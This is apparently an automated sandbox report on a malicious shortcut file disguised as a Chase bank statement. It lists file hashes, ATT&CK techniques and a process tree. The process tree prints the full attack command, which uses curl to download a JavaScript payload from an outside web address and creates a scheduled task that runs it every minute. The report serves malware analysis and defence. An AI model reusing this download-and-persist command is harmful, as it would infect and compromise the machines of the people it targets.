8cb1720beb77d55edc7b7622efea064b4f1f940cba1fa92c9d682e2dbb33414c

Analysis

max time kernel
132s
max time network
120s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
06-06-2024 13:33

Target

Chasebank_Statement_May.lnk
Size

2KB
MD5

6bef4f06938cf2569a3ad26a9827269a
SHA1

e9a2dbcf2bf6bead0f46c60b7b8b5ffcf0dcfc50
SHA256

22ce45aa4ec31f4937872fb15d6ae787168c0f5a8399f514dd69e4eecbdc075c
SHA512

989181fdb9e591f113d54e18c31f093f681b9b30b3651d06c81fd202a51735079b8fe90f5bc708428ec973eefcf83ea7b3e982786d7c19a19d1512965c739b9c

Score

3^/10

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2352 schtasks.exe

pid	process
2352	schtasks.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.execmd.exetaskeng.exe

description	pid	process	target process
PID 1688 wrote to memory of 2916	1688	cmd.exe	cmd.exe
PID 1688 wrote to memory of 2916	1688	cmd.exe	cmd.exe
PID 1688 wrote to memory of 2916	1688	cmd.exe	cmd.exe
PID 2916 wrote to memory of 2352	2916	cmd.exe	schtasks.exe
PID 2916 wrote to memory of 2352	2916	cmd.exe	schtasks.exe
PID 2916 wrote to memory of 2352	2916	cmd.exe	schtasks.exe
PID 2716 wrote to memory of 3020	2716	taskeng.exe	wscript.EXE
PID 2716 wrote to memory of 3020	2716	taskeng.exe	wscript.EXE
PID 2716 wrote to memory of 3020	2716	taskeng.exe	wscript.EXE
PID 2716 wrote to memory of 1640	2716	taskeng.exe	wscript.EXE
PID 2716 wrote to memory of 1640	2716	taskeng.exe	wscript.EXE
PID 2716 wrote to memory of 1640	2716	taskeng.exe	wscript.EXE
PID 2716 wrote to memory of 632	2716	taskeng.exe	wscript.EXE
PID 2716 wrote to memory of 632	2716	taskeng.exe	wscript.EXE
PID 2716 wrote to memory of 632	2716	taskeng.exe	wscript.EXE

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Chasebank_Statement_May.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl -s -v -o HYgncxmQatsP.js "https://www.dsestimation.com/wp-content/uploads/2015/10/azoxyphenetole04.php" & schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js' eTs6LGHd8vSKWwb" /tn eTs6LGHd8vSKWwb
2⤵
- Suspicious use of WriteProcessMemory
PID:2916

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js' eTs6LGHd8vSKWwb" /tn eTs6LGHd8vSKWwb
3⤵
- Creates scheduled task(s)
PID:2352

C:\Windows\system32\taskeng.exe
taskeng.exe {E12D3FBA-7C65-4EF6-9862-72EDC6EA5EE9} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js" eTs6LGHd8vSKWwb
2⤵
PID:3020

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js" eTs6LGHd8vSKWwb
2⤵
PID:1640

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js" eTs6LGHd8vSKWwb
2⤵
PID:632